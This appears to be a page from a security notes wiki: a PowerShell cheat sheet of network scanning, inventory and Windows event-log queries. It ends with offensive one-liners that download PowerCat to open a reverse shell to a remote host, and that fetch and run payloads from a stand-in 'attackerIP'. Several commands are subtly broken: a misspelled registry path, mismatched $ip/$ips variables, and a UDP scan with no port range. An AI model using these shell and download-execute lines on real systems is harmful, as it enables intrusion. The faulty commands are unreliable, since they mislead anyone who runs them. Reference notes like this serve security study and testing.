PowerShell

Simple Ping Sweep

2..254 | Foreach-Object { Test-Connection -ComputerName XXX.XXX.XXX.$_}

Each host scans for its neighbours ($ComputerList in this instance would refer to a variable created to reference a text file with a list of computer names in it)

$Results = Invoke-Command - ComputerName $ComputerList -ScriptBlock { Get-NetNeighbor -AddressFamily IPv4 | Where-Object {$_.LinkLayerAddress -notlike "01-00-5E*" -and $_.LinkLayerAddress -notlike "FF-FF-FF-FF-FF-FF"} }

Software inventory list (Can be altered to loop through a list of computers as per above)

@("HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*","HKLM:\SOFTWARE\Wow6432node\Mircrosoft\Windows\CurrentVersion\Uninstall\*") | ForEach-Object { Get-ItemProperty "$_" | Select-Object DisplayName,PSChildName,Publisher,InstallLocation}

Simple TCP port scan (IPv4) (1234..5678 refers to port range)

$ip = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
$ips | ForEach-Object { $ip =$_; 1234..5678 | ForEach-Object { Test-NetConnection -ComputerName $ip -Port $_ -InformationLevel Quiet }}

Simple UDP port scan (IPv4)

$ips = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
$ips | ForEach-Object { $ip =$_; $UDP = New-Object System.Net.Sockets.UdpClient ($ip); $UDP.Connect($ip,$_) }

Search for string in file recursively through folders and provide path of file

Get-ChildItem -Recurse | Select-String "dummy" -List | Select Path

Get Windows security events and group by ID count

Get-Winevent -LogName Security | Group-Object -Property Id -NoElement

Display all successful logons within 24 hours and provide usernames (Ensure TargetWorkstation variable exists)

Invoke-Command {Get-WinEvent -FilterHashTable @{LogName="Security";Id=4624;StartTime=$((Get-Date).AddDays(-1))} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5]} | Select-Object -ExpandProperty "#text" | Group-Object -NoElement } -ComputerName $TargetWorkstation

Active Directory - Search for last logon date of specified user

Get-ADUser -Identity username -Properties "LastLogonDate"

Find all local users who have logged in during the last 10 days (adjust (-10) to change days)

Get-LocalUser | Where-Object {$_.Lastlogon -ge (Get-Date).AddDays(-10)} | Select-Object Name,Enabled,SID,Lastlogon | Format-List

Method for discovering accounts logged into the most systems across the network by count (Ensure Workstations variable exists)

Invoke-Command {Get-WinEvent -FilterHashTable @{LogName="Security";Id=4624} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5]} | Select-Object -ExpandProperty "#text" | Group-Object | Sort-Object -Property Count -Descending} -ComputerName $Workstations | Select-Object -Property Name | Sort-Object -Descending -Property Count

Detect randomness of filenames within given directory. (See also, Security Tools List for the Freq-PS script required for this command). Method for finding malicious files with random names.

. C:\Scripts\freq.ps1 #Location of freq.ps1 script
Get-ChildItem | Get-FrequencyScore -Property Name | Select-Object -Property Name,FrequencyScore | Sort-Object -Property FrequencyScore -Unique

Downloading PowerCat from GitHub, then using it to open a connection to a remote server

IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besmorhino/powercat/master/powercat.ps1'); powercat -c <REMOTEIP> -p <REMOTEPORT> -e powershell

The following will download and store a remote file to disk.

Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when ran from a command prompt.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')“

PreviousPerl NextPython

Last updated 3 years ago